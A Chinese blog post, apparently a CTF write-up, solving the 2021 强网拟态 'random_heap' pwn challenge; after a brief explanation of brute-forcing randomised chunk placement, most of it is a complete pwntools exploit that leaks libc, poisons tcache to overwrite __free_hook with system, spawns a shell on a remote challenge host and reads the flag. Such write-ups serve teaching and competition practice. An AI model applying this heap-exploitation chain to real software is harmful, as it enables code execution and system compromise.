0
点赞
收藏
分享

微信扫一扫

2021强网拟态 pwn random_heap

cnlinkchina 2022-01-20 阅读 43
网络安全

在这里插入图片描述
题目的难度在于他chunk分配的地址是随机的。
如何能破掉这种随机。
我采取的方法是硬爆破,直到爆破到我想要的那种形式,我们加以利用。
爆破的过程中可以稍加采取限制,减少爆破时间。

# -*- coding: utf-8 -*-
from pwn import*
from ctypes import *

#context.log_level='debug'
context.arch='amd64'
context.os = "linux"
#context.terminal = ["tmux", "splitw", "-h"]

local = 0
if local:
    r = process('./random_heap')
else:
    r = remote("124.71.140.198", 49153)
    

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()


#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
libc = ELF("./libc-2.27.so")
libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

def debug():
    gdb.attach(r)
    pause()

def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

def add(index, size):
    sla("Your choice: ", "1")
    sla("Index: ", str(index))
    sla("Size: ", str(size))


def edit(index, content):
    sla("Your choice: ", "2")
    sla("Index: ", str(index))
    sla("Content: ", content)


def show(index):
    sla("Your choice: ", "3")
    sla("Index: ", str(index))


def delete(index):
    sla("Your choice: ", "4")
    sla("Index: ", str(index))

v0 = libcc.time(0)
libcc.srand(v0)

for i in range(64):
    add(i, 0x80)
    a = libcc.rand()

for i in range(64):
    delete(i)

s = ""

for i in range(64):
    show(i)
    s = ru("\n")
    if len(s) > 15 and s[14] == '\x7f':
        break

malloc_hook = (u64(s[9:15].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
lg("libc_base", libc_base)

for i in range(64):
    edit(i, p64(free_hook))

ss = ['a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a']

for i in range(63):
    add(i, 0x80)
    edit(i, '/bin/sh\x00')
    a = libcc.rand() & 0xf
    print int(a)
    if ss[int(a)] == 'b':
        edit(i, p64(system_addr))
        break
    ss[int(a)] = "b"

print ss
delete(0)

sl("cat flag")
    
r.interactive()

举报

相关推荐

0 条评论